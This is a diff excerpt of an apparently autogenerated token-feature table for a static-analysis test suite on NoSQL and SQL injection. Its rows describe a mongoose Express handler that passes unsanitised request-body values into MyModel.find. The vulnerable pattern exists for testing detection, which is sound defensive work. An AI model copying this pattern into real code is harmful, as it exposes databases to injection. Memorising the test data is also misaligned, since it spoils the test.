autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:25:9:27 | res | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:25:9:27 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:9:25:9:27 | res | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:7:10:7 | v | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:7:10:7 | v | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:7:10:7 | v | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:7:10:7 | v | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:7:10:7 | v | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:7:10:32 | v | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:7:10:32 | v | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:7:10:32 | v | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:7:10:32 | v | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:7:10:32 | v | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:7:10:32 | v = JSO ... body.x) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:7:10:32 | v = JSO ... body.x) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:7:10:32 | v = JSO ... body.x) | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:7:10:32 | v = JSO ... body.x) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:7:10:32 | v = JSO ... body.x) | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:11:10:14 | JSON | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:11:10:14 | JSON | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:11:10:14 | JSON | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:11:10:14 | JSON | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:11:10:14 | JSON | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:11:10:20 | JSON.parse | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:11:10:20 | JSON.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:11:10:20 | JSON.parse | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:11:10:20 | JSON.parse | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:11:10:20 | JSON.parse | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:11:10:32 | JSON.pa ... body.x) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:11:10:32 | JSON.pa ... body.x) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:11:10:32 | JSON.pa ... body.x) | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:11:10:32 | JSON.pa ... body.x) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:11:10:32 | JSON.pa ... body.x) | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:11:10:32 | exceptional return of JSON.pa ... body.x) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:11:10:32 | exceptional return of JSON.pa ... body.x) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:11:10:32 | exceptional return of JSON.pa ... body.x) | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:11:10:32 | exceptional return of JSON.pa ... body.x) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:11:10:32 | exceptional return of JSON.pa ... body.x) | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:16:10:20 | parse | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:16:10:20 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:16:10:20 | parse | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:16:10:20 | parse | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:16:10:20 | parse | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:22:10:24 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:22:10:24 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:22:10:24 | req | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:22:10:24 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:22:10:24 | req | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:22:10:29 | req.body | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:22:10:29 | req.body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:22:10:29 | req.body | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:22:10:29 | req.body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:22:10:29 | req.body | fileImports | ./mongooseModel body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:22:10:31 | req.body.x | CalleeFlexibleAccessPath | JSON.parse | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:22:10:31 | req.body.x | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:22:10:31 | req.body.x | contextFunctionInterfaces | | @@ -3237,6 +15820,41 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:22:10:31 | req.body.x | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:22:10:31 | req.body.x | fileImports | ./mongooseModel body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:22:10:31 | req.body.x | receiverName | JSON | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:26:10:29 | body | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:26:10:29 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:26:10:29 | body | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:26:10:29 | body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:26:10:29 | body | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:31:10:31 | x | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:31:10:31 | x | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:31:10:31 | x | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:31:10:31 | x | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:10:31:10:31 | x | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:3:11:9 | MyModel | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:3:11:9 | MyModel | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:3:11:9 | MyModel | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:3:11:9 | MyModel | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:3:11:9 | MyModel | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:3:11:14 | MyModel.find | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:3:11:14 | MyModel.find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:3:11:14 | MyModel.find | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:3:11:14 | MyModel.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:3:11:14 | MyModel.find | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:3:11:25 | MyModel ... d: v }) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:3:11:25 | MyModel ... d: v }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:3:11:25 | MyModel ... d: v }) | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:3:11:25 | MyModel ... d: v }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:3:11:25 | MyModel ... d: v }) | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:3:11:25 | exceptional return of MyModel ... d: v }) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:3:11:25 | exceptional return of MyModel ... d: v }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:3:11:25 | exceptional return of MyModel ... d: v }) | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:3:11:25 | exceptional return of MyModel ... d: v }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:3:11:25 | exceptional return of MyModel ... d: v }) | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:11:11:14 | find | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:11:11:14 | find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:11:11:14 | find | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:11:11:14 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:11:11:14 | find | fileImports | ./mongooseModel body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:16:11:24 | { id: v } | CalleeFlexibleAccessPath | MyModel.find | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:16:11:24 | { id: v } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:16:11:24 | { id: v } | calleeImports | ./mongooseModel | @@ -3246,6 +15864,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:16:11:24 | { id: v } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:16:11:24 | { id: v } | fileImports | ./mongooseModel body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:16:11:24 | { id: v } | receiverName | MyModel | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:18:11:19 | id | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:18:11:19 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:18:11:19 | id | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:18:11:19 | id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:18:11:19 | id | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:18:11:22 | id: v | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:18:11:22 | id: v | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:18:11:22 | id: v | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:18:11:22 | id: v | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:18:11:22 | id: v | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:18:11:22 | id: v | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:18:11:22 | id: v | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:18:11:22 | id: v | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:18:11:22 | id: v | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:18:11:22 | id: v | fileImports | ./mongooseModel body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:22:11:22 | v | CalleeFlexibleAccessPath | MyModel.find | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:22:11:22 | v | InputAccessPathFromCallee | 0.id | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:22:11:22 | v | InputArgumentIndex | 0 | @@ -3256,6 +15889,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:22:11:22 | v | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:22:11:22 | v | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:11:22:11:22 | v | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:3:12:9 | MyModel | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:3:12:9 | MyModel | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:3:12:9 | MyModel | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:3:12:9 | MyModel | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:3:12:9 | MyModel | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:3:12:14 | MyModel.find | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:3:12:14 | MyModel.find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:3:12:14 | MyModel.find | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:3:12:14 | MyModel.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:3:12:14 | MyModel.find | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:3:12:35 | MyModel ... y.id }) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:3:12:35 | MyModel ... y.id }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:3:12:35 | MyModel ... y.id }) | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:3:12:35 | MyModel ... y.id }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:3:12:35 | MyModel ... y.id }) | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:3:12:35 | exceptional return of MyModel ... y.id }) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:3:12:35 | exceptional return of MyModel ... y.id }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:3:12:35 | exceptional return of MyModel ... y.id }) | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:3:12:35 | exceptional return of MyModel ... y.id }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:3:12:35 | exceptional return of MyModel ... y.id }) | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:11:12:14 | find | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:11:12:14 | find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:11:12:14 | find | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:11:12:14 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:11:12:14 | find | fileImports | ./mongooseModel body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | CalleeFlexibleAccessPath | MyModel.find | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | calleeImports | ./mongooseModel | @@ -3265,6 +15923,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | fileImports | ./mongooseModel body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | receiverName | MyModel | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:18:12:19 | id | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:18:12:19 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:18:12:19 | id | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:18:12:19 | id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:18:12:19 | id | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:18:12:32 | id: req.body.id | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:18:12:32 | id: req.body.id | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:18:12:32 | id: req.body.id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:18:12:32 | id: req.body.id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:18:12:32 | id: req.body.id | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:18:12:32 | id: req.body.id | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:18:12:32 | id: req.body.id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:18:12:32 | id: req.body.id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:18:12:32 | id: req.body.id | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:18:12:32 | id: req.body.id | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:22:12:24 | req | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:22:12:24 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:22:12:24 | req | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:22:12:24 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:22:12:24 | req | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:22:12:29 | req.body | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:22:12:29 | req.body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:22:12:29 | req.body | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:22:12:29 | req.body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:22:12:29 | req.body | fileImports | ./mongooseModel body-parser express | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:22:12:32 | req.body.id | CalleeFlexibleAccessPath | MyModel.find | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:22:12:32 | req.body.id | InputAccessPathFromCallee | 0.id | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:22:12:32 | req.body.id | InputArgumentIndex | 0 | @@ -3275,6 +15958,41 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:22:12:32 | req.body.id | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:22:12:32 | req.body.id | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:22:12:32 | req.body.id | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:26:12:29 | body | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:26:12:29 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:26:12:29 | body | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:26:12:29 | body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:26:12:29 | body | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:31:12:32 | id | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:31:12:32 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:31:12:32 | id | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:31:12:32 | id | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:12:31:12:32 | id | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:3:13:9 | MyModel | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:3:13:9 | MyModel | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:3:13:9 | MyModel | enclosingFunctionBody | req res v JSON parse req body x MyModel find id v MyModel find id req body id MyModel find id req body id | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:3:13:9 | MyModel | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:3:13:9 | MyModel | fileImports | ./mongooseModel body-parser express | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:3:13:14 | MyModel.find | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/mongooseModelClient.js:13:3:13:14 | MyModel.find | contextSurroundingFunctionParameters | (req, res) | +| 